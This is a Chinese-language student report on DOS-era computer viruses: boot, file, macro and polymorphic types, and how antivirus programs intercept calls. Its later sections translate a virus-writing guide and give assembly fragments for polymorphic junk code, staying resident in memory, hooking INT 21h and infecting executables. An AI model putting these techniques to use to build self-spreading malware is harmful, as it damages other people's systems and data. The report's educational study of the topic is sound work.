VIRUS

VIRUS

資訊二 b85506036 粘宇村
目錄
 0.①什麼是電腦病毒？
1.②開機型病毒
 2.③檔案型病毒？
3.④複合型及伴隨型病毒
 4. 多形病毒
 5. 文件導向式的病毒感染:
6. 常駐型病毒的詳細說明⑵

0.①什麼是電腦病毒？

電腦病毒，顧名思義，所指的是電腦（一般指個人電腦）作業系

統下的一種程式，它被撰寫的目的多數是為了破壞及惡作劇，但卻常

因為大眾的認知不足，造成一般電腦使用者的恐慌及害怕，

所謂電腦病毒，事實上必須符合三個必要的條件：⑴複製⑵散播

以及⑶破壞。這三個條件，缺一而不為電腦病毒。如使用者會聽到的

「特洛依程式」、「玩笑程式」、「信件炸彈」、「ANSI炸彈」等，

基本上都不應該也不能屬於電腦病毒的範圍之內。如一般使用者最常聽見

的米開蘭基羅（石化三代），便符合了複製（感染磁片），散播（磁片開

機）及破壞（摧毀硬碟）三個要素。

那麼，病毒又是存在於那裏的呢？病毒一定是藏在磁性記憶體上。

，因為病毒本身就是一種電腦程式。那麼，簡單的說，病毒可能存在於⑴

軟碟⑵硬碟及⑶記憶體中。而電腦病毒本身，也可以有很多種分類方法，

如⑴開機型及檔案型（⑵常駐及非常駐型及⑶編碼型及非編碼型)

等等。因此，符合上述三要件的，才能稱之為「電腦病毒」。下面，就

來介紹電腦病毒的種類以及特徵。

回目錄 1.②開機型病毒

所謂開機型的病毒(Boot-type virus) 是界定為在電腦開機時，

搶先作業系統進入記憶體的程式。正常我們由軟碟開機的程序如下

┌───┐ ┌───┐ ┌──┐ ┌───┐ ┌─────┐

│ │ │ 程序 │ │載入│ │載入 │ │ 載入 │

└───┘ └───┘ └──┘ └───┘ └─────┘

由於病毒必須取得磁碟讀寫的控制權（這樣才能達成感染的目的

），因此開機型病毒本身會存在於開機磁區(Boot Area) ，以便在載

入OS時會先OS載入以取得絕對控制權。因此感染（中毒）後開機的程

序變成了下面這樣：

┌───┐ ┌───┐ ┌──┐ ┌───┐ ┌─────┐

│ │ │ 程序 │ │載入│ │載入 │ │ 載入 │

└───┘ └───┘ └──┘↑└───┘ └─────┘

↑

病毒載入

我們看到了病毒在 DOS載入前載入，這樣便可以利用讀寫磁片的

機會（如dir 指令）進行感染。而硬式磁碟的感染，就是比軟碟多了

一項硬碟分割表的檢查程序，而開機型病毒便可藏身於開機磁區或是

硬碟分割表中，多了一種可能。

回目錄

2.③檔案型病毒？

所謂檔案型的病毒(File-type virus) 是介定為在檔案執行時，

先原檔案之前放執行的程式。病毒本體寄居於可執行檔案中，當此

檔案被執行時，便侵入作業系統取得絕對控制權。當然也有不常駐

而僅在放執行時感染其它檔案的病毒，

而病毒要如何去取得控制權呢？大體而言病毒都是朝BIOS呼叫

及 DOS呼叫兩方面著手。取得中斷進入點。方式則千奇百怪，如早期的

正常方式( Int21h's 25h& 35h)，中期的單步中斷（MacGyver 1.0) 及字串比

對法（ MacGyver4.0 & T4-Virion)

通常正常的中斷呼叫程序為：

┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐

│ 中斷產生 │→│ DOS 處理│→│ BIOS 處理│→│ 硬體 I/O │

└─────┘ └─────┘ └─────┘ └─────┘

而當病毒試圖去入侵記憶體時，它可能會有兩種侵入的方式：

┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐

│ 中斷產生 │→│ DOS 處理│→│ BIOS 處理│→│ 硬體 I/O │

└─────┘↑└─────┘↑└─────┘ └─────┘

↑ ↑

病毒攔截⑴ 病毒攔截⑵

其中⑴的方式就是取得 DOS的進入點（當然還有分是末端進入

點還是原始進入點），而⑵的方式就是取得BIOS的原始進入點。

當病毒侵入記憶體後，便是和開機型病毒相同，藉由磁碟的作

動來達到複製的目的。由於近年各式各樣的程式愈

來愈多，檔案型的病毒也就愈來愈猖獗啦！

但是，提到這裏，也不得不先提一下防毒程式的工作方式。通

常防毒程式的工作場合有二：

┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐

└─────┘↑└─────┘↑└─────┘ └─────┘

↑ ↑

※防毒程式⑴※ ※防毒程式⑵※

可以看到，防毒程式的動作竟和病毒十分相似！！事實上也是如

此，很多防毒的技巧都是病毒先「發明」出來的啦！但是，為什麼防

毒程式仍然每每會被高強的病毒穿過呢？不知大家有沒有發現，雖然

位置相同，病毒和防毒程式卻還是有先後的關係？舉例來說，若今天

有一隻病毒利用特殊方法拿到BIOS原始進入點，那結果不就成了：

┌─────┐ ┌─────┐ ┌─────┐ ┌────

| | | | | | | |

│ 中斷產生 │→│ DOS 處理│→→ │ BIOS 處理│→│硬體 I/O|

└─────┘↑└─────┘↑ ↑└─────┘ └──── ↑ ↑ ↑

※防毒程式⑴※ ↑ ※病毒攔截※

※防毒程式⑵※

這樣病毒就可以低於防毒程式，甚至擾亂防毒程式！！

回目錄

3.④複合型及伴隨型病毒

複合型(Multi-partite) 病毒綜合了開機型及檔案型的特性，

以及兩者的感染方式，更加快了病毒程式散播的速度，如國內較

常見的MacGyver 2.0就屬這一類型

至於伴隨型病毒，則是利用 DOS執行檔案的順序，將本體複

製為欲感染之檔案，僅是附檔名不同（.EXE改為.COM），並將自

己隱藏起來，這樣它不用破壞原檔案，即可達成侵入記憶體的目

的。若筆者沒記錯，AIDS病毒就是伴隨型病毒的先軀。

回目錄

4.多形病毒

多形現象，所指的就是病毒在每次感染時都會改變自己的形態，讓它保持原有的功能但看起來卻完全不同。這個目的可以利用結果相同但不同的指令來達成。比如：

XOR BP,BP ;db 31h, 0edh

SUB BP,BP ;db 29h, 0edh

這兩行指令做的是同一件事－讓BP歸零。但是它們的機械碼是不同的！因此，假若我們隨機地使用這些同樣功能但不同的指令，那要用固定掃描碼式的方式掃描就不可能了！這在改變病毒中唯一不變的地方－stub（解碼前指令）時是非常好用的。這樣還不夠。演算法式掃描是AV公司能想到唯一的解決方法；不過這個較難的方法讓他們的＄更難賺了些。所有的掃毒程式都有它們內建的 MtE, SMEG, NED 偵測器，不過那也都是另外附加的。

多形的產生，不過是把指令集合成堆，並隨機地選用它們。而亂數產生器又總是和時計有關。下面是兩個方法：

;8 bit random number

IN AL,40H ;Puts a random value in AL.

;40h is the timer port.

;16 bit random number

IN AX,40H ;Puts a random value in AX.

;Another random number

XOR AH,AH ;Puts a random value in DX.

INT 1AH ;1ah function 0 read system timer.

;This is basically the same as the

;previous examples.

再來你可以用 XOR 或 AND 來製造更大的亂度。

指令集是你所需要的，但是為了寫作方便的考量，二位元組指令的平方是最好的選擇（可選 2,4,8,16 ）。如此，你可以得到你要的亂數，並將不需要的位元設為０（用AND）。舉例而言，若有４個隨機指令可以選擇，那麼你可用：

AND AX,3 ;3 = 00000011b

於是乎，你就剩下４個選擇啦！

將指令集的偏移量設到某暫存器內，再把亂數乘以２加到其內（因為指令是２位元組長）。現在你擁有一個隨機指令啦！你所剩下的工作就是把它移到你想放置的地方，你的工作就完成啦！

下面是某些簡單多形中所必須同時加入的指令：

IN AX,40H ;Random number in AX.

AND AX,3 ;Between 0-3.

SHL AX,1 ;Multiply by two because instructions

;are two bytes long.

MOV SI,OFFSET DATABASE ;SI points to start of database.

ADD SI,AX ;Add SI with AX the random offset.

MOV DI,OFFSET POLY1 ;Put the random instruction here.

MOVSW ;Move the instruction.

RET ;Finished.

;Garbage 'do nothing' instructions.

DATABASE DB 2CH,0 ; = sub al,0

DB 89H,0C0H ; = mov ax,ax

DB 88H,0C9H ; = mov cl,cl

DB 21H,0D2H ; = and dx,dx

這僅僅是一個簡單的範例，但卻是初學者的入門課程！你可以發現它並未使用太多的指令。 MtE 和 NED 表現的更好，但是它們用了超過 1000 Bytes 的指令！這太誇張了吧！

另一個有用的地方就是在編碼器上。隨機垃圾碼可以讓你的病毒比原有的 255種變化增加至少千種！將變化過長度的指令置入，那麼你就有一個不定長度的編碼器啦！(Randomise the actual number of variable bytes put in and you can have a variable length encryptor)而真正的變形程序則必須藏身在編碼過程中並在病毒感染檔案前被呼叫。

有些你所需要注意的事。你所用的指令集合中的指令必須是同樣長度的。你可以用三種不同長度的指令集合，但是你不能把它們混在一起。使用 DEBUG，並輸入偽裝指令的程式碼。

回目錄

5.文件導向式的病毒感染: Word 7.0 巨集病毒

到底何謂巨集呢？我們可以回溯到當年的 PE2時代，只要玩過電腦的都

知道，要 PE2執行的好，真正需要的檔案有兩個：PE2.EXE, PE2.PRO，其中

的 .PRO 定義了鍵盤哪些鍵的作用，我們可以說，這便是巨集的濫觴。

隨著套裝軟體的愈做愈大，人們逐漸發現，常用的一些對檔案編輯的動

作，事實上可以歸為一整套的指令，然而，每個人所常用的指令與常用的指

令動作都不同，於是乎，每個套裝軟體便會自己定義出一些指令供使用者發

揮使用，最明顯的例子是 Lotus 123和獨立成一套的語言 dbase，儼然因為

巨集的指令過於強大，走上命令解譯器如 BASIC 的道路。

同樣的事情發生在 Word 的身上，不過 Word 的模式不同，它定義出一

個範本模式，將檔案資料，以及該檔案所需要的巨集整合在一種名為 .dot

的範本檔案之中，這種作法已經不同於以往的套裝軟體將資料和巨集分開儲

存的方法。正因為這種是巨集亦是資料的檔案格式，便產生巨集感染的可能

性。因為，檔案資料的可攜性極高，如果巨集亦隨著檔案而被分派到不同的

工作平台，只要能被執行，不也相似於病毒的傳染過程？不過這種形式的傳

染，就會有原始碼被公開的危機，而且正因為原始碼是公開的，這個病毒的

一切行為便無所遁形了。

Word 的工作模式是只要一載入範本檔案，就先執行起始的巨集，接著

載入資料內容，這個創意本來是好的，因為隨著資料不同而需要有不同的巨

集工作。可是事實上，很少人會對巨集產生興趣，因為巨集的撰寫相當於學

習一套程式語言，儘管它的語法被撰寫的很簡單，可是大多數的人，一方面

在不知情，一方面或是知道有巨集這麼一回事，卻依然寧願多花個幾秒重複

數個動作。因此， Word 便為大眾事先定義一個共用的範本檔案(Normal.dot)

，裡面包含了基本的巨集(隨軟體不同)。

這樣子的手法，更是為巨集感染開啟大門。因為如果是一個範本一個巨

集，那麼傳染途徑就只能經由這個單一檔案而已，只要一被人發現，公開說

某某檔案是有問題的檔案，那麼這個檔案存活率勢必很小，因為沒有人會行

這種自殺的行為，除非是故意的。但是共用範本的存在，卻去除了這種憂慮

，只要某某有心人士，要問題巨集自身複製、或撰寫感染碼進公用巨集，那

麼好玩了，以後只要一進入 Word ，公用範本一併被事先載入，只要存下任

何範本檔案，那麼該檔案就無可避免地成了問題文件。

可是畢竟巨集是儲存於範本文件裡面的啊，在 office 裡面，範本文件

是統一放置在 Template 資料夾裡面，如果我們沒有動到裡面的任何一個範

本巨集，那麼為何我們還是會感染到巨集病毒呢？關於這個問題，實際上便

牽涉到微軟公司對於 Word 檔案格式處理的矛盾。

我們以磁碟作業系統 (DOS)一個很有名的例子來看，作業系統的執行檔

案作業的程序是先從檔案的副檔名，判斷其是否為可執行檔 (.EXE) ，或者

命令檔 (.COM) 。但只要是編譯過程式的人都知道，DOS 對於這樣子的區分

並不嚴格，它只是單單對副檔名以二元分類法辨別出這個檔案可不可執行，

接著從裡面的檔案格式去選擇載入於記憶體中的方式，因此。如果我們將一

個可執行格式的檔案 (*.EXE) 改命名為命令檔 (*.COM) ，實際上它依然是

以可執行檔格式被載入記憶體中而被執行。

同理，這種包含內外兩種不同檔案格式的謬誤，在 Win 95 中並未被解

決 (事實上，它並沒有被解決的必要) 。 Word 在決定以何種方式載入文件

的時候，事實上是先到 Win95系統中的登錄項去尋找是否有此登錄，在載入

的時候，根據實際的格式決定這個文件被執行的方式。換句話說，我們可能

載入一個事實上為 .dot 格式的 .doc 檔案，只要這種情形一發生，當我們

不自覺地看見 Word 將檔案顯示在螢幕的瞬間，此文件內藏的巨集，已經經

由 Word 被載入記憶體中而執行了，如果巨集作者再聰明一點的話，他就會

侵入共用範本(Normal.dot)，這麼一來，每次只要一啟動 Word ，你的電腦

中便等著被有問題的巨集騷擾了。

我們可以這樣子說，檔案式病毒警告我們不要隨便複製別人的檔案，磁

碟式病毒警告我們不要使用來路不明的磁碟，那麼，在標榜以文件導向為主

的 Win95 裡，或許類似 Taiwan NO.1 一類的巨集病毒給我們的最大的啟示

，或許是要我們不可以隨便偷看別人文件吧！

. Interrupt 13h 屬於 BIOS 硬體中斷...負責磁碟的 I/O...包括軟碟硬碟等等...

透過 INT 13h 您可以對磁碟中任一位置進行讀寫...Partition 與 Boot

區當然不例外

Interrupt 21h 屬於 DOS 軟體中斷...正常的話應是由 Command.com 所提供...

它的功能就多了...因為它可以說是 DOS 本體...

舉凡您在 DOS 中所有可看到的功能一定會去呼叫該中斷處理一些東東...

攔截方面以組語來說...

mov ax,3521h

int 21h

會由 es:bx 傳回 int 21h 的進入點位址這個位址也可以從

0000:0021h*4這個位址中得到進入點位址..在記憶體中是反相儲存的...

mov ax,2521h

mov ds,您欲代替 int 21h的程式進入點節位址(Segment)

mov dx,您欲代替 int 21h的程式進入點段位址(Offset)

int 21h 就可以攔截

同理...直接去修改 0000:0021h*4 這個位址一樣也可以達到攔截效果

以 C 來說有兩個較重要的函式

setvector(設定中斷新進入點位址) 與 getvector(求中斷位址)

一樣可以模擬出上述的動作

您可以使用指標指向 0000:0021h*4 這個位址直接

I/O(直接修改的前提是您的程式節位址段位址要先求出)

攔截的技巧非常多...需要有一定經驗...如果您開始練習攔截的話...

例:int 21h...很多情況下您都必需幫它處理 Stack...以免 Stack overflow

或者是更嚴重的問題...Stack 的重入問題...您最好選上面說過 3 種語言之一來學...如 C 語言就是不錯的選擇...因為 C 語言有 Inline 的 assembly 語法...不怕處理得不夠低階...只是使用這種語法的話...又會有很多問題...畢竟 C 尚屬高階語言...您不知道編輯器塞了啥東東進您的執行檔...倒不如組語...把程式寫出來後就可以預知執行檔有多大...這是 C 較辦不到的地方...更可能會因此帶來不可預知的錯誤發生...

重要的bios中斷

int 19h 當我們開機之後bios就是執行這中斷服務程式而將boot磁區

載入。

int 18h 若系統上有basic rom，則開機後rom bios會將int 18h的中斷

向量指向rom basic。

int 13h 做physical的讀取，而不受logical磁碟的限制，也就是說，

int 13h可以讀取磁碟實體的任何一個磁區。

中斷向量表

系統中斷向量表位於記憶體絕對位址00000h~000FFh，對應於

int 0h~int 0FFh。每個中斷向量為四個byte。

回目錄

6.常駐型病毒的詳細說明⑵

~~~~

結構

~~~~

這種病毒包含了兩大部分：載入機制以及攔截處理。載入機制提供了兩種功能。首先，它會將中斷向量轉至病毒本身；其次，它將病毒常駐。而攔截處理則含有會導致感染檔案的程式碼。廣義而言，處理機制會竄改第21號中斷並截斷某些可用於執行檔案的呼叫。

~~~~~~~~

載入機制

~~~~~~~~

載入機制包含了兩大部分：常駐程序以及還原程序。後者所做的，就如同非常駐型病毒的一般，將控制權交回原始檔案。至今已經了解感染.COM檔的奧義。只要把開頭前幾位元組換掉，控制權便移轉到病毒上。還原.COM檔的秘訣僅僅只要將被覆蓋的那幾位元組還原即可。這個還原過程發生在記憶體中，所以並不是永久的。由於.COM檔只佔單一節區，且總是由此節區內偏移值 100h 處載入（因為要預留 PSP的空間），復原程序變的異常簡單。舉例而言，假如名為"first3"的緩衝區內存放的是受病毒感染前檔案的前三位元組，則以下的程式

碼便會在記憶體中將原始碼還原：

mov di,100h ; Absolute location of destination

lea si,[bp+first3] ; Load address of saved bytes.

; Assume bp = "delta offset"

movsw ; Assume CS = DS = ES and a cleared direction flag

movsb ; Move three bytes

將控制權交還程式的問題仍然存在。亦即表示必須強迫程式將控制權移轉到偏移值100h 的處。最簡單的解法就像：

mov di,100h

jmp di

這個程序有多種變化可以做到，但它們都達到將IP設為 100h 的基本要求。現在，你應該也瞭解了感染.EXE檔的奧義。最簡易的手法就是替換.EXE檔檔頭的某些固定的位元組。還原的秘訣就在於恢復所有病毒做過的修改。程式如下：

mov ax, es ; ES = segment of PSP

add ax, 10h ; Loading starts after PSP

add word ptr cs:[bp+OrigCSIP+2], ax ; Header segment value was

; relative to end of PSP

cli

add ax, word ptr cs:[bp+OrigSSSP+2] ; Adjust the stack as well

mov ss, ax

mov sp, word ptr cs:[bp+OrigSSSP]

sti

db 0eah ; JMP FAR PTR SEG:OFF

OrigCSIP dd ? ; Put values from the header

OrigSSSP dd ? ; into here

假如你想用.COM檔做為一個只會感染.EXE檔的病毒之載體，你只要輕鬆地將OrigCSIP設為 FFF0:0000就好啦！這將會被還原程序還原成 PSP:0000 ，就是通常放第20號中斷之處。

這些內容應該都不是新東西。現在我們要跨出通往新領域的步伐。達到常駐的方法有兩種。第一種方法就是利用 DOS呼叫完成任務的「幼雉方法」

。真正的病毒作者會自己寫常駐程序。最基本的便是「竄改 MCB」法。

通則是：

① 簡查是否已常駐。若已經常駐，則跳出病毒。

② 找到記憶體頂端。

③ 配置高記憶體。

④ 複製病毒至高記憶體。

⑤ 置換中斷向量。

這個技巧有許多不同的風貌，在有需要時會一一討論。

~~~~~~~~

安裝查核

~~~~~~~~

安裝查核有評多不同的類別。最常見的就是呼叫第21號中斷，並在AX暫存器中放入特定的值。假若由某特定暫存器傳回某特定值，那表示此病毒已經常駐過了。舉例而言

，一個確認常駐的範例如下：

mov ax,9999h ; residency check

int 21h

cmp bx,9999h ; returns bx=9999h if installed

jz already_installed

當你為了安裝查核，而要選放入AX的值時，記得不要衝到既有的呼叫，除非原本就是無害的。比如說，不要使用秀字串在螢幕上的呼叫(ah=9)，除非你希望在它第一次常駐時發生不可預期的結果！而無害的呼叫，就像是取得 DOS版本(ah=30h)或是更新鍵盤緩衝區(ah=0bh)的呼叫。當然，假若這個檢查與現有的功能衝到，那你必須非常小心的確認沒有程式會對它感冒。舉例而言，不要只誘捕ah=30h，而是要誘捕ax=3030h或是將ax=3030h以及bx=3030h同時誘導。

另一種檢查是否已常駐的方法就是去找尋病毒中的某些特徵。比如說，假若某病毒總是將某未使用的中斷呼叫指向它本身，一個檢查的方法便是去找尋此特徵所使用的中斷向量。如下：

xor ax,ax

mov ds,ax ; ds->interrupt table

les bx,ds:[60h*4] ; get address of interrupt 60h

; assume the virus traps this and puts its int 21h handler

; here

cmp es:bx,0FF2Eh ; search for the virus string

int60:

jmp far ptr cs:origint21

當你使用此法時，請小心確認此特徵不會在病毒常駐時失效。在上例中，其它程式就不能攔截 60h，否則查核會失效。甚至當病毒已載入記憶體時，會產生不可預期的後果。

~~~~~~~~~~~~~~~~

尋找記憶體的頂端

~~~~~~~~~~~~~~~~

DOS 通常配置所有的記憶體給被載入的程式。利用這個知識，病毒可以很容易的得到可使用的記憶體大小。重覆一次，MCB 的結構是：

Offset Size Meaning

------ ------- -------

0 BYTE 'M' or 'Z'

1 WORD Process ID (PSP of block's owner)

3 WORD Size in paragraphs

5 3 BYTES Reserved (Unused)

8 8 BYTES DOS 4+ uses this. Yay.

mov ax,ds ; Assume DS initially equals the segment of the PSP

dec ax

mov ds,ax ; DS = MCB of infected program

mov bx,ds:[3] ; Get MCB size (total available paragraphs to program)

一個有同樣效果卻更簡單的方法是按照下列方式使用DOS 的重配置記憶體呼叫：

mov ah,4ah ; Alter memory allocation (assume ES = PSP)

mov bx,0FFFFh ; Request a ridiculous amount of memory

int 21h ; Returns maximum available memory in BX

; This is the same value as in ds:[3]

~~~~~~~~~~~~

配置高記憶體

~~~~~~~~~~~~

配置記憶體最簡單的方法是透過DOS 完成你的工作：

mov ah,4ah ; Alter memory allocation (assume ES = PSP)

sub bx,(endvirus-startvirus+15)/16+1 ; Assume BX originally held total

; memory available to the program (returned by earlier

; call to int 21h/function 4ah

int 21h

mov ah,48h ; Allocate memory

mov bx,(endvirus-startvirus+15)/16

int 21h

mov es,ax ; es now holds the high memory segment

dec bx

mov byte ptr ds:[0], 'Z' ; probably not needed

mov word ptr ds:[1], 8 ; Mark DOS as owner of MCB

將MCB 的擁有者設為DOS 的目的是為了防止當載體程式結束時，記憶區段會被釋放的後果。

當然，有人喜愛直接修改MCBs的值。這是很容易做到的。假設DS的值和載體程式MCB的節位址相同，下面的程式提供了這種技巧：

; Step 1) Shrink the carrier program's memory allocation

; One paragraph is added for the MCB of the memory area which the virus

; will inhabit

sub ds:[3],(endvirus-startvirus+15)/16 + 1

; Step 2) Mark the carrier program's MCB as the last in the chain

; This isn't really necessary, but it assures that the virus will not

; corrupt the memory chains

mov byte ptr ds:[0],'Z'

; Step 3) Alter the program's top of memory field in the PSP

; This preserves compatibility with COMMAND.COM and any other program

; which uses the field to determine the top of memory

sub word ptr ds:[12h],(endvirus-startvirus+15)/16 + 1

; Step 4) Calculate the first usable segment

mov bx,ds:[3] ; Get MCB size

stc ; Add one for the MCB segment

adc bx,ax ; Assume AX still equals the MCB of the carrier file

; BX now holds first usable segment. Build the MCB

; there

; Alternatively, you can use the value in ds:[12h] as the first usable

; segment:

; mov bx,ds:[12h]

; Step 5) Build the MCB

mov ds,bx ; ds holds the area to build the MCB

inc bx ; es now holds the segment of the memory area controlled

mov es,bx ; by the MCB

mov byte ptr ds:[0],'Z' ; Mark the MCB as the last in the chain

; Note: you can have more than one MCB chain

mov word ptr ds:[1],8 ; Mark DOS as the owner

mov word ptr ds:[3],(endvirus-startvirus+15)/16 ; FIll in size field

下面則又是另一種直接修改MCB 的方法。

; Step 1) Shrink the carrier program's memory allocation

; Note that rounding is to the nearest 1024 bytes and there is no

; addition for an MCB

sub ds:[3],((endvirus-startvirus+1023)/1024)*64

; Step 2) Mark the carrier program's MCB as the last in the chain

mov byte ptr ds:[1],'Z'

; Step 3) Alter the program's top of memory field in the PSP

sub word ptr ds:[12h],((endvirus-startvirus+1023)/1024)*64

; Step 4) Calculate the first usable segment

mov es,word ptr ds:[12h]

; Step 5) Shrink the total memory as held in BIOS

; Memory location 0:413h holds the total system memory in K

xor ax,ax

mov ds,ax

sub ds:[413h],(endvirus-startvirus+1023)/1024 ; shrink memory size

後者比前者強大，因為它比前者簡單且短小。新的MCB 不需被建立，因為DOS 將不再配置被病毒佔據的記憶體。修改記載在BIOS資料區有關記憶體大小的記錄可以保證這個情形。

~~~~~~~~~~~~~~~~~~

複製病毒至高記憶體

~~~~~~~~~~~~~~~~~~

這真是件十分可笑的容易事。只要將ES對準高記憶體節區，DS對準CS，BP對準偏移值，下面的程式碼便可以達到目的：

lea si,[bp+offset startvirus]

xor di,di ; destination @ 0

mov cx,(endvirus-startvirus)/2

rep movsw ; Copy away, use words for speed

~~~~~~~~~~~~

置換中斷向量

~~~~~~~~~~~~

再度，有兩個方式可以使用：透過DOS 或直接置換。每個有心的程式設計者都曾和中斷向量奮鬥過。若透過DOS ：

push es ; es->high memory

pop ds ; ds->high memory

mov ax,3521h ; get old int 21h handler

int 21h ; to es:bx

mov word ptr ds:oldint21,bx ; save it

mov word ptr ds:oldint21+2,es

mov dx,offset int21 ; ds:dx->new int 21h handler in virus

mov ax,2521h ; set handler

int 21h

而若直接修改：

xor ax,ax

mov ds,ax

lds bx,ds:[21h*4]

mov word ptr es:oldint21,bx

mov word ptr es:oldint21+2,ds

mov ds,ax

mov ds:[21h*4],offset int21

mov ds:[21h*4+2],es

由於變數的位置已經知道，位移值差距的計算並不十分重要。這是因為病毒總是載入至高記憶體偏移值０的地方。

~~~~~~~~

攔截處理

~~~~~~~~

攔截處理機制是用於截斷DOS 的呼叫並轉接至病毒。傳統上，攔截處理是由一個檢查安裝查核呼叫的步驟開始。舉例來說：

int21:

cmp ax,9999h ; installation check?

jnz not_installation_check

xchg ax,bx ; return bx = 9999h if installed

iret ; exit interrupt handler

not_installation_check:

; rest of interrupt handler goes here

在不妨礙的情形下，病毒可以竄改任何它想攔截的DOS 呼叫。通常最有竄改價值的呼叫是檔案執行(ax=4b00h)，如此一來，每個被執行的檔案都會被感染。另一個可以竄改的呼叫是代碼關閉（雖然這要花較多的工夫）。這種感染就會發生在拷貝、觀看、補綴上。在某些呼叫上，前置鏈結較好；反之，則用後置鏈結。就當做基本常識吧！假如被攔截的呼叫將會破壞檔案或指位器，那麼使用前置鏈結。若是呼叫必須在感染前完成，那就使用後置鏈結。（譯注：前置鏈結表示該呼叫在感染行為前串接，反之亦然）

前置鏈結很簡單：

pushf ; simulate an int 21h call

call dword ptr cs:oldint21

; The following code ensures that the flags will be properly set upon

; return to the caller

pushf

push bp

push ax

; flags [bp+10]

; calling CS:IP [bp+6]

; flags new [bp+4]

; bp [bp+2]

; ax [bp]

mov bp, sp ; setup stack frame

mov ax, [bp+4] ; get new flags

mov [bp+10], ax; replace the old with the new

pop ax ; restore stack

pop bp

popf

在鏈結完成，離開攔截處理時，使用 iret 較 retn 或 retf 為佳。後置鏈結更簡單：

jmp dword ptr cs:oldint21 ; this never returns to the virus int handler

當離開攔截處理時，請確認堆疊的完整及暫存器的原值。務必在前置鏈結之後及後置鏈結前保存下暫存器的內值。

常駐式病毒的感染動作基本上和非常駐病毒是相同的。唯一的不同處是在當攔截處理竄改感染程序中某個會用到的呼叫之時。比如說，若是要竄改代碼關閉呼叫，那麼感染程序就要用一個指向原 int21h 處理器的程序把代碼關閉的呼叫換掉。就像：

pushf

call dword ptr cs:oldint21

對常駐病毒而言，當處理編碼過程時，這也是必須的。在非常駐病毒中，病毒碼在整個過程中是沒有必要保存下來的。然而，就算是在感染發生時，保持解碼完的攔截處理程式是值得做的。因此，病毒要在記憶體中留下兩份拷貝：一份就是程式而另一份視做資料。編碼器就將後者編碼而保持攔截處理在程式中。這是相當重要的，尤其是當病毒還會竄改其它中斷，如 int09h 或 int13h 時。

~~~~~~~~~~~~~~~~~~

常駐病毒的一項理論

~~~~~~~~~~~~~~~~~~

常駐病毒在傳統上可分為兩類：慢速傳染型及快速傳染型。這兩類各有其利弊得失。

慢速傳染型是除了檔案建立外都不感染的。這類病毒修改建檔程序，並在檔案關閉時感染檔案。感染將發生在新檔的建立及檔案的拷貝上。這種病毒的一個缺點就是它散佈的太慢了。然而，這個缺點也正是優點所在，它將可以保持長時間的不可偵測。雖然感覺上此類病毒較無效率，不過事實上它們表現的不錯！在建檔時傳染，同時表示，那些所謂的 Checksum/CRC 式防毒程式無法在感染之前對此檔案進行 Checksum/CRC 處理。除此之外，檔案通常多由一個目錄拷貝至另一個不同的目錄。故此類病毒可行。

快速傳染型在執行檔案時傳染。這類病毒通常立即攻擊常用程式，以確保下次開機後仍能存在於記憶體中。這是它們的主要優點，卻也是最大的缺點。因為這類病毒傳染的十分快速，使用者很容易會發現系統的不尋常；尤其是在病毒未使用任何隱形技巧之時。

當然，沒人敢說那一種是較佳的。這是個人喜好的問題。雖然慢速傳染型病毒正在急速增加，現今大多數病毒仍是快速感染型。

當病毒欲在建檔或拷貝時感染，它必須把檔名複製到緩衝區內，執行呼叫，並保存代碼。當收到此代碼的關檔指示時，就利用剛保存的檔名去感染檔案。這是不用追入DOS內部，僅是在關閉代碼後感染的一個最簡單的方法。

回目錄

以上資料來自:

1. 黑暗天使病毒寫作指南５ Chung Yuan-Kai 譯

2. 電腦病毒世界探密系列之一動95 鍾元凱

3. 關於巨集病毒 foolman

4. 電腦病毒徹底研究施威銘工作室

5. 電腦病毒程式解析王旭